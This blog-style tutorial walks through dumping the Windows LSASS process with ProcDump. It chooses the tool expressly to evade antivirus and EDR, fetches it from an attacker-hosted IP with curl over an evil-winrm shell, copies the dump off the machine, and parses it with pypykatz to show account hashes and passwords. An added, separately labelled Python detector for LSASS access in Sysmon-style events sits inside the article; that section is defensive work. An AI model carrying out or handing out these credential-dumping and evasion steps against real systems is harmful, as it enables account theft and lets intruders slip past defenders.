18th September 2021
procdump dumping lsass

How to dump LSASS with ProcDump

This article is for educational purposes only! I do not encourage you to run this to a machine you do not have permission to run. Performing these actions without permission can lead to prosecution by the courts. I am not responsible for your actions!

In this short article, I will walk you through the steps to dump the LSASS process on a machine running Microsoft Windows. Without further ado, let's jump into it.

Overview

If you are working on a CTF or you are assigned to pentest a machine, you may find yourself in a situation where you need to dump the LSASS process. You can use the well-known tool Mimikatz for this purpose. Mimikatz has one big problem, though: it is recognized by 57 / 70 antivirus products on VirusTotal, so using Mimikatz is not a wise choice in most environments. There is a high chance that the antivirus notices you, revealing to the blue teamers that you are in the network.

To avoid detection, you can take a LOLBAS (Living Off the Land Binaries and Scripts) approach and use ProcDump instead of Mimikatz. ProcDump is recognized by 1 / 68 antivirus products on VirusTotal.

Even when using ProcDump you have to watch out. Some companies have deployed an EDR (Endpoint Detection and Response) solution on their systems. Most EDR solutions will generate a Medium alert when ProcDump is used to dump a process, especially when the LSASS process is involved.
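The EDR alert described above is usually built on two telemetry sources: a process-creation event whose command line names both the dump tool and lsass, and a process-access event in which some image opens lsass.exe with memory-read rights. The following is an added example (not code from the original post, and not any vendor's detection logic): a minimal detector in Python over constructed Sysmon-style events (Event ID 1 ProcessCreate and Event ID 10 ProcessAccess field names). The sample events, the allowlist of images that may legitimately open LSASS, and the rule names are all assumptions made for this example.

```python
"""Minimal LSASS-dump detector over Sysmon-style events.

Added example, not part of the original post. The event dicts below are
constructed for this example and mimic Sysmon Event ID 1 (ProcessCreate)
and Event ID 10 (ProcessAccess) fields.
"""

# Process access rights from winnt.h. A minidump of another process needs at
# least PROCESS_VM_READ; PROCESS_ALL_ACCESS (0x1FFFFF) includes that bit.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF

# Images that open LSASS with read access as part of normal operation.
# Assumption for this example: a real deployment tunes this to its baseline.
LSASS_ACCESS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# Constructed sample events (hypothetical hostnames, paths and users).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\temp\procdump.exe",
     "CommandLine": r".\procdump.exe -accepteula -ma lsass.exe lsass.dmp",
     "User": "FUTURE\\Administrator"},
    {"EventID": 10, "SourceImage": r"C:\temp\procdump.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe",
     "GrantedAccess": "0x1FFFFF", "CallTrace": "..."},
    {"EventID": 10, "SourceImage": r"C:\Windows\system32\wininit.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe",
     "GrantedAccess": "0x1410", "CallTrace": "..."},
    # Benign use of the same tool against a different process: no alert.
    {"EventID": 1, "Image": r"C:\tools\procdump.exe",
     "CommandLine": r"procdump.exe -accepteula -ma 4711 w3wp.dmp",
     "User": "FUTURE\\rodny"},
]


def reads_process_memory(granted_access: str) -> bool:
    """True if a hex GrantedAccess mask allows reading the target's memory."""
    return bool(int(granted_access, 16) & PROCESS_VM_READ)


def is_lsass(image: str) -> bool:
    """True if an image path points at lsass.exe (case-insensitive)."""
    return image.lower().endswith("\\lsass.exe")


def detect(events):
    """Return a list of (rule_name, detail) findings for the given events."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 10 and is_lsass(ev.get("TargetImage", "")):
            src = ev.get("SourceImage", "")
            if src.lower() in LSASS_ACCESS_ALLOWLIST:
                continue  # baseline process, not worth an alert
            if reads_process_memory(ev.get("GrantedAccess", "0x0")):
                findings.append(("lsass_memory_read",
                                 f"{src} opened lsass.exe with "
                                 f"GrantedAccess {ev['GrantedAccess']}"))
        elif ev.get("EventID") == 1:
            image = ev.get("Image", "").lower()
            cmdline = ev.get("CommandLine", "").lower()
            if "procdump" in image and "lsass" in cmdline:
                findings.append(("procdump_lsass_cmdline",
                                 f"{ev.get('User')} ran: {ev['CommandLine']}"))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Two points a practitioner would want to check before relying on rules like these: Sysmon only emits Event ID 10 for targets listed in an include rule of its configuration, so lsass.exe must be explicitly covered there, and the command-line rule is trivially bypassed by renaming the binary, which is why the process-access rule (which keys on the target and the access mask rather than the tool name) is the one to keep.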

ProcDump

ProcDump is part of the Windows Sysinternals suite. The main purpose of this command-line utility is to troubleshoot CPU spikes by generating crash dumps during a spike, so that an administrator or developer can determine the cause. It can, however, also generate a dump of any running process, and it is this last capability that is useful in our scenario.

Dumping LSASS

In this example, I have broken into a system and want to dump LSASS. I already have a shell on the machine through Windows Remote Management (WinRM) with evil-winrm.

On the victim machine, we download procdump.exe to the C:\temp directory. I host an HTTP server on my attacker machine to serve the binary.

*Evil-WinRM* PS C:\temp> curl 10.10.14.13/procdump.exe -o procdump.exe

Now we can dump the lsass.exe process.

*Evil-WinRM* PS C:\temp> .\procdump.exe -accepteula -ma lsass.exe lsass.dmp
ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[03:22:03] Dump 1 initiated: C:\temp\lsass.dmp
[03:22:03] Dump 1 writing: Estimated dump file size is 53 MB.
[03:22:04] Dump 1 complete: 53 MB written in 0.8 seconds
[03:22:04] Dump count reached.

OK, we now have the lsass.dmp file, which contains juicy information. We need to transfer it to our attacker machine to analyze its contents.

*Evil-WinRM* PS C:\temp> download lsass.dmp

Info: Downloading C:\temp\lsass.dmp to lsass.dmp

Info: Download successful!

Extracting lsass.dmp

To analyze the contents we use Pypykatz, a Python implementation of Mimikatz. If you do not have pypykatz installed, you can fetch it by running the command below.

┌──(root💀kali)-[/home/kali/hacking]
└─# git clone https://github.com/skelsec/pypykatz.git
Cloning into 'pypykatz'…
remote: Enumerating objects: 2482, done.
remote: Counting objects: 100% (852/852), done.
remote: Compressing objects: 100% (348/348), done.
remote: Total 2482 (delta 539), reused 754 (delta 501), pack-reused 1630
Receiving objects: 100% (2482/2482), 903.21 KiB | 4.38 MiB/s, done.
Resolving deltas: 100% (1504/1504), done.

Now run Pypykatz against the lsass.dmp file.

┌──(root💀kali)-[/home/kali/hacking]
└─# pypykatz lsa minidump lsass.dmp
INFO:root:Parsing file lsass.dmp
FILE: ======== lsass.dmp =======
== LogonSession ==
authentication_id 3146260 (300214)
session_id 0
username Administrator
domainname FUTURE
logon_server FUTURE
logon_time 2021-06-19T10:21:54.261897+00:00
sid S-1-5-21-1199094703-3580107816-3092147818-500
luid 3146260

== LogonSession ==
authentication_id 2849314 (2b7a22)
session_id 0
username Administrator
domainname FUTURE
logon_server FUTURE
logon_time 2021-06-19T10:12:08.766735+00:00
sid S-1-5-21-1199094703-3580107816-3092147818-500
luid 2849314

== LogonSession ==
authentication_id 347219 (54c53)
session_id 1
username rodny
domainname FUTURE
logon_server FUTURE
logon_time 2021-06-19T09:32:07.942538+00:00
sid S-1-5-21-1199094703-3580107816-3092147818-1002
luid 347219
    == MSV ==
         Username: rodny
         Domain: FUTURE
         LM: NA
         NT: 499ae<REDACTED>742ffe
         SHA1: b7c4ec<REDACTED>d18141113cc78
    == WDIGEST [54c53]==
         username rodny
         domainname FUTURE
         password None
    == Kerberos ==
         Username: rodny
         Domain: FUTURE
         Password: None
    == WDIGEST [54c53]==
         username rodny
         domainname FUTURE
         password None
    == CREDMAN [54c53]==
         luid 347219
         username FUTURE\rodny
         domain FUTURE\rodny
         password [email protected]@
...

You have now parsed the lsass.dmp file, which can contain plain-text passwords. You can also try to crack the LM and NT hashes with hashcat.

Happy hacking! 🙂

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.
